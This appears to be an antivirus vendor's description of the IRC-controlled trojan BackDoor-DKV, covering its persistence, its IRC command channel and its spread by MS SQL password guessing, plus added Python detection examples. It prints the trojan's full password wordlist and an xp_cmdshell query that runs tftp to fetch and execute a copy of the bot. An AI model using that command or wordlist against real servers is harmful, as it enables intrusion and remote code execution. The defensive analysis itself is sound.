BackDoor-DKV

This page shows details and results of our analysis of the malware BackDoor-DKV.

Overview

The BackDoor-DKV trojan has a number of threat vectors: it connects to IRC, downloads more malware from a remote site and opens a backdoor on the local computer.


Minimum DAT

4960 (2007-02-09)

Updated DAT

6127 (2010-10-05)

Minimum Engine

5.1.00

File Length

varies

Description Added

2007-02-09

Description Modified

2007-03-05

Malware Proliferation

Characteristics

--- Updated February 9th, 2007:
BackDoor-DKV has been deemed Low-Profiled due to media attention at http://www.taipeitimes.com/News/taiwan/archives/2007/02/09/2003348274
--

This is an IRC-controlled backdoor, which provides an attacker with unauthorized remote access to the compromised machine. The attacker can perform the following actions on the infected machine:

  • Retrieve system information
  • Download files from given URLs
  • Execute programs remotely
  • Start and stop services
  • Perform DDOS
  • Uninstall the bot

The characteristics of this BackDoor with regard to file names, port numbers used, etc. will differ depending on how the attacker configured it. Hence, this is a general description.

Symptoms

When the BackDoor is executed, it drops the following file:

  • %SysDir%\dydhcp.exe (A copy of itself)

In an attempt to make the dropped files harder to find, the files may have their attributes changed to hidden and system.

Note: %SysDir% is a variable location and refers to the Windows System directory.

The following mutex is created so that it will be in memory only once:

  • DBWinMutex

The following registry entry is modified so the BackDoor can run at system startup:

  • HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run "Dynamic DHCP" = "%System%\dydhcp.exe"

Once running, the BackDoor component connects to a predefined IRC server on port 4783 and joins a predefined channel by issuing the JOIN command.

At the time of writing this VIL, the author had set the Topic of the channel to the URL of a malicious executable. The BackDoor interprets this topic as a command, and the file is downloaded and executed on the victim's machine.

The files downloaded from this URL are detected as W32/SpotFace.worm.
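
The persistence entry and the outbound IRC connection described above can be checked from an exported Run key and a netstat-style connection listing. This is an added Python example, not code from the original description; the .reg text and connection records are constructed samples, and the parser handles only plain string values.

```python
import re

# Indicators from the description above: the dropped file, the Run-key value
# name and the IRC port. The DBWinMutex mutex is also created by Windows'
# debug-output facility (OutputDebugString), so it is not used as an indicator.
DROPPED_FILE = "dydhcp.exe"
RUN_VALUE_NAME = "Dynamic DHCP"
IRC_PORT = 4783
RUN_KEY = r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run"

def parse_reg_export(text):
    """Parse a minimal .reg export into {key: {value_name: data}} (string values only)."""
    keys, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys[current] = {}
        elif current is not None and line.startswith('"'):
            m = re.match(r'"([^"]+)"="(.*)"$', line)
            if m:  # .reg exports double every backslash; undo that
                keys[current][m.group(1)] = m.group(2).replace("\\\\", "\\")
    return keys

def find_run_key_indicator(reg_text):
    """Return Run values matching the BackDoor-DKV persistence entry."""
    findings = []
    for key, values in parse_reg_export(reg_text).items():
        if key.lower() != RUN_KEY.lower():
            continue
        for name, data in values.items():
            if name == RUN_VALUE_NAME or data.lower().endswith(DROPPED_FILE):
                findings.append(f"Run value '{name}' -> {data}")
    return findings

def find_irc_connections(conns):
    """Flag established connections to the predefined IRC port (netstat-style records)."""
    return [f"{c['process']} -> {c['remote']}:{c['port']}"
            for c in conns if c["port"] == IRC_PORT and c["state"] == "ESTABLISHED"]

# Constructed sample data, not taken from a real host.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"ctfmon.exe"="C:\\WINDOWS\\system32\\ctfmon.exe"
"Dynamic DHCP"="C:\\WINDOWS\\system32\\dydhcp.exe"
'''
SAMPLE_CONNS = [
    {"process": "svchost.exe", "remote": "10.0.0.2", "port": 443, "state": "ESTABLISHED"},
    {"process": "dydhcp.exe", "remote": "203.0.113.7", "port": 4783, "state": "ESTABLISHED"},
]
```

Running find_run_key_indicator(SAMPLE_REG) and find_irc_connections(SAMPLE_CONNS) flags the Dynamic DHCP value and the dydhcp.exe connection to port 4783 while leaving the benign entries alone.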

Method of Infection

As this threat is a trojan rather than a virus, it does not spread by itself but can be instructed to spread by a malicious user or by commands in the IRC channel name.

This BackDoor trojan can be instructed to scan for vulnerable machines on the network, and uses the following Microsoft vulnerabilities to spread.

It can scan for computers with an exposed port 1433 (the default MS SQL Server port) and attempts to create an SQL connection to that port. It tries to log on with the following username and password combinations:

  • administrator
  • administrador
  • administrateur
  • administrat
  • admins
  • admin
  • adm
  • password1
  • password
  • passwd
  • pass1234
  • pass
  • pwd
  • 0071
  • 12
  • 123
  • 1234
  • 12345
  • 123456
  • 1234567
  • 12345678
  • 123456789
  • 1234567890
  • 2000
  • 2001
  • 2002
  • 2003
  • 2004
  • test
  • guest
  • none
  • demo
  • unix
  • linux
  • changeme
  • default
  • system
  • server
  • root
  • null
  • qwerty
  • mail
  • outlook
  • web
  • www
  • internet
  • accounts
  • accounting
  • home
  • homeuser
  • user
  • oem
  • oemuser
  • oeminstall
  • windows
  • win98
  • win2k
  • winxp
  • winnt
  • win2000
  • qaz
  • asd
  • zxc
  • qwe
  • bob
  • jen
  • joe
  • fred
  • bill
  • mike
  • john
  • peter
  • luke
  • sam
  • sue
  • susan
  • peter
  • brian
  • lee
  • neil
  • ian
  • chris
  • eric
  • george
  • kate
  • bob
  • katie
  • mary
  • login
  • loginpass
  • technical
  • backup
  • exchange
  • f***
  • b****
  • sl**
  • sex
  • god
  • hell
  • hello
  • domain
  • domainpass
  • domainpassword
  • database
  • access
  • dbpass
  • dbpassword
  • databasepass
  • data
  • databasepassword
  • db1
  • db2
  • db1234
  • sa
  • sql
  • sqlpassoainstall
  • orainstall
  • oracle
  • ibm
  • cisco
  • dell
  • compaq
  • siemens
  • hp
  • nokia
  • xp
  • control
  • office
  • blank
  • winpass
  • main
  • lan
  • internet
  • intranet
  • student
  • teacher
  • staff

(Note, asterisks above replace content)

If authentication is successful and the compromised SQL account has sufficient rights, the bot connects with the following connection string and runs the following query, which uses xp_cmdshell to invoke "tftp.exe" to download and execute a copy of the bot:

DRIVER={SQL Server};SERVER=%s,%d;UID=%s;PWD=%s;%s
EXEC master..xp_cmdshell 'tftp -i %s GET irn.exe&start irn.exe&exit

  • Weak password exploitation of network shares

The trojan can be instructed to send itself by finding improperly secured NetBIOS shares. It attempts to connect to computers with shared drives and tries the above listed password combinations.
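
The MS SQL password guessing and the xp_cmdshell/tftp download step described above leave traces in the SQL Server error log and in captured T-SQL. This added Python example (not code from the original description) flags clients that exceed a failed-login threshold within a short window and captured statements that run tftp through xp_cmdshell; the threshold, window, log lines and statements are constructed assumptions, and the share-based spreading would instead show up in Windows logon-failure events, which this example does not cover.

```python
import re
from collections import defaultdict
from datetime import datetime

# Thresholds are assumptions for this example, not values from the description.
FAILED_LOGIN_THRESHOLD = 5
WINDOW_SECONDS = 60

# SQL Server error-log "Login failed" line, e.g.
# 2007-02-09 10:15:01.23 Logon  Login failed for user 'sa'. Reason: ... [CLIENT: 10.0.0.5]
LOGIN_FAIL = re.compile(
    r"^(\d{4}-\d\d-\d\d \d\d:\d\d:\d\d)\.\d+\s+Logon\s+Login failed for user '([^']*)'.*\[CLIENT: ([\d.]+)\]")
# xp_cmdshell running tftp is the download step shown in the query above.
CMDSHELL_TFTP = re.compile(r"xp_cmdshell.*\btftp\b.*\bGET\b", re.IGNORECASE)

def detect_sql_bruteforce(lines):
    """Return {client_ip: sorted distinct users} for clients exceeding the failure threshold in a window."""
    attempts = defaultdict(list)  # client -> [(timestamp, user)]
    for line in lines:
        m = LOGIN_FAIL.match(line)
        if m:
            ts = datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S")
            attempts[m.group(3)].append((ts, m.group(2)))
    flagged = {}
    for client, events in attempts.items():
        events.sort()
        for i, (start, _) in enumerate(events):
            window = [u for t, u in events[i:] if (t - start).total_seconds() <= WINDOW_SECONDS]
            if len(window) >= FAILED_LOGIN_THRESHOLD:
                flagged[client] = sorted(set(window))
                break
    return flagged

def detect_cmdshell_tftp(statements):
    """Return captured T-SQL statements (e.g. from a SQL trace) that run tftp via xp_cmdshell."""
    return [s for s in statements if CMDSHELL_TFTP.search(s)]

# Constructed sample log lines and statements, not from a real server.
SAMPLE_LOG = [
    f"2007-02-09 10:15:0{i}.00 Logon       Login failed for user '{u}'. Reason: Password did not match "
    f"that for the login provided. [CLIENT: 10.0.0.5]"
    for i, u in enumerate(["sa", "sa", "admin", "administrator", "root"])
] + ["2007-02-09 10:20:00.00 Logon       Login failed for user 'alice'. Reason: Password did not match "
     "that for the login provided. [CLIENT: 10.0.0.9]"]
SAMPLE_STATEMENTS = [
    "SELECT name FROM master..sysdatabases",
    "EXEC master..xp_cmdshell 'dir C:\\'",
    "EXEC master..xp_cmdshell 'tftp -i 203.0.113.7 GET irn.exe&start irn.exe&exit'",
]
```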

Removal

A combination of the latest DATs and the Engine will be able to detect and remove this threat. AVERT recommends that users not trust seemingly familiar or safe file icons, particularly when received via P2P clients, IRC, email or other media where users can share files.


Variants